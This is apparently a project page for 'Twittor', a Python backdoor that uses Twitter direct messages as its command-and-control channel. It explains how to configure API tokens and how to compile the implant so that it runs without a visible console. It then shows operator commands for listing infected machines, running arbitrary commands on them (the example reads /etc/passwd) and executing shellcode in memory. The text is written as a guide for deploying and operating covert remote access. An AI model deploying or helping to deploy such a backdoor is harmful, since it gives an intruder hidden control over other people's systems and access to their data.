Twittor is a stealthy Python based backdoor using Twitter (Direct Messages) as a command and control server. This project has been inspired by Gcat which does the same but using a Gmail account.
Setup
For this to work you need:
- A Twitter account (Use a dedicated account! Do not use your personal one!)
- Register an app on Twitter with Read, write, and direct messages Access levels.
Install the dependencies:
1 |
$ pip install -r requirements.txt |
This repo contains two files:
twittor.py
which is the clientimplant.py
the actual backdoor to deploy
In both files, edit the access token part and add the ones that you previously generated:
1 2 3 4 5 6 7 |
CONSUMER_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX' CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX' ACCESS_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX' ACCESS_TOKEN_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX' USERNAME = 'XXXXXXXXXXXXXXXXXXXXXXXX' |
You’re probably going to want to compile implant.py
into an executable using Pyinstaller. In order to remove the console when compiling with Pyinstaller, the flags --noconsole --onefile
will help. Just saying.
Usage
In order to run the client, launch the script.
1 |
$ python twittor.py |
You’ll then get into an ‘interactive’ shell which offers few commands that are:
1 2 3 4 5 6 7 8 9 10 11 12 |
$ help refresh - refresh C&C control list_bots - list active bots list_commands - list executed commands !retrieve <jobid> - retrieve jobid command !cmd <MAC ADDRESS> command - execute the command on the bot !shellcode <MAC ADDRESS> shellcode - load and execute shellcode in memory (Windows only) help - print this usage exit - exit the client $ |
Once you’ve deployed the backdoor on a couple of systems, you can check available clients using the list command:
1 2 3 |
$ list_bots B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-with-Ubuntu-14.04-precise $ |
The output is the MAC address which is used to uniquely identifies the system but also gives you OS information the implant is running on. In that case a Linux box.
Let’s issue a command to an implant:
1 2 3 |
$ !cmd B7:76:1F:0B:50:B7 cat /etc/passwd [+] Sent command "cat /etc/passwd" with jobid: UMW07r2 $ |
Here we are telling B7:76:1F:0B:50:B7
to execute cat /etc/passwd
, the script then outputs the jobid that we can use to retrieve the output of that command.
You can download Twittor here:
Or read more here.